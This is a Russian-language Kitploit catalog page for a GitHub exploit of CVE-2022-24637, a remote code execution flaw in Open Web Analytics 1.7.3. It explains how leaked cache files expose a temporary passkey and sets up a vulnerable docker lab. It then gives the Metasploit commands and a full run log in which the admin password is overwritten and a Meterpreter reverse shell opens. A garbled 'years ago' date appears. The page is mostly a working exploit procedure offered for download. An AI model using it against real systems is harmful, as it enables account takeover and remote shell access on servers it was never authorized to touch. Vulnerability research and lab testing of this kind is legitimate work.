Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-24637 — Open Web Analytics 1.7.3 - Удаленное выполнение кода | Kitploit
Инструменты/GitHubGitHub/pflegusch/cve-2022-24637
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubpflegusch/cve-2022-24637

CVE-2022-24637

Open Web Analytics 1.7.3 - Удаленное выполнение кода

Репозиторий
443 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уязвимое приложение

Open Web Analytics (OWA) до версии 1.7.4 позволяет неаутентифицированному удаленному злоумышленнику получить конфиденциальную информацию о пользователях, которая может быть использована для получения привилегий администратора с помощью кэшированных хэшей. Это происходит потому, что файлы, созданные с помощью `<?php (вместо правильной последовательности "<?php) не обрабатываются интерпретатором PHP.

Шаги проверки

  1. Запустите уязвимый экземпляр OWA с помощью docker

    • Скачайте https://github.com/Pflegusch/CVE-2022-24637/blob/main/deployment/docker-compose.yml
    • Запустите контейнеры: docker compose up -d
    • Откройте http://127.0.0.1:80/
    • Следуйте шагам установки, используя переменные окружения из файла docker-compose.yml
      • Публичный URL: http://127.0.0.1/
      • Хост базы данных (docker inspect <db-container> и получить IPAddress, например )
172.22.0.2
  • Порт базы данных: 3306
  • Имя базы данных: owa
  • Пользователь базы данных: owa
  • Пароль базы данных: Demo12+#
  • Продолжить
  • Домен сайта: http://127.0.0.1
  • Имя администратора: admin
  • E-Mail: [email protected]
  • Пароль: Demo12+#
  • Продолжить
  • Запустите msfconsole

  • use exploit/multi/http/open_web_analytics_rce

  • set RHOSTS 127.0.0.1

  • set RPORT 80

  • set SSL false

  • set LHOST 172.22.0.1 -> это должен быть IP-адрес моста, созданного командой docker compose up -d

  • check

  • run

  • Параметры

    Password

    При эксплуатации цели пароль атакованного пользователя будет перезаписан этим паролем.

    Username

    Пользователь, который будет целью данной эксплойта.

    Расширенные параметры

    SearchLimit

    Эксплойт работает путем извлечения значения temp_passkey из файла кэша, который создается для каждого пользователя при попытке входа в систему с его помощью. Поскольку каталог /owa-data/caches/ общедоступен, мы можем получить эти файлы кэша. Точный путь к файлам кэша зависит от user_id и может быть вычислен с его помощью. Этот параметр определяет, сколько вычисленных путей, начиная с 0, должно быть проверено на наличие файлов кэша со значением temp_passkey.

    Сценарии

    Версия 1.7.3 с использованием развертывания docker, описанного выше

    root@kitploit:~
    msf6 exploit(multi/http/open_web_analytics_rce) > set RHOSTS 127.0.0.1
    RHOSTS => 127.0.0.1
    msf6 exploit(multi/http/open_web_analytics_rce) > set LHOST 172.22.0.1
    LHOST => 172.22.0.1
    msf6 exploit(multi/http/open_web_analytics_rce) > run
    
    [*] Started reverse TCP handler on 172.22.0.1:4444 
    [*] Running automatic check ("set AutoCheck false" to disable)
    [+] The target appears to be vulnerable. Open Web Analytics 1.7.3 is vulnerable
    [+] Connected to http://127.0.0.1/ successfully!
    [*] Attempting to find cache of 'admin' user
    [+] Found temporary password for user 'admin': 85038e7e9f541ae4c4939d3044e628a5
    [+] Changed the password of 'admin' to 'pwned'
    [+] Logged in as admin user
    [*] Creating log file
    [+] Wrote payload to file
    [*] Sending stage (39927 bytes) to 172.22.0.3
    [+] Deleted QY0yivK4.php
    [*] Meterpreter session 1 opened (172.22.0.1:4444 -> 172.22.0.3:55434) at 2023-03-15 01:28:54 +0100
    [+] Triggering payload! Check your listener!
    
    meterpreter > pwd
    /var/www/html/owa-data/caches
    meterpreter > getuid
    Server username: www-data
    meterpreter >
    
    Скачать инструмент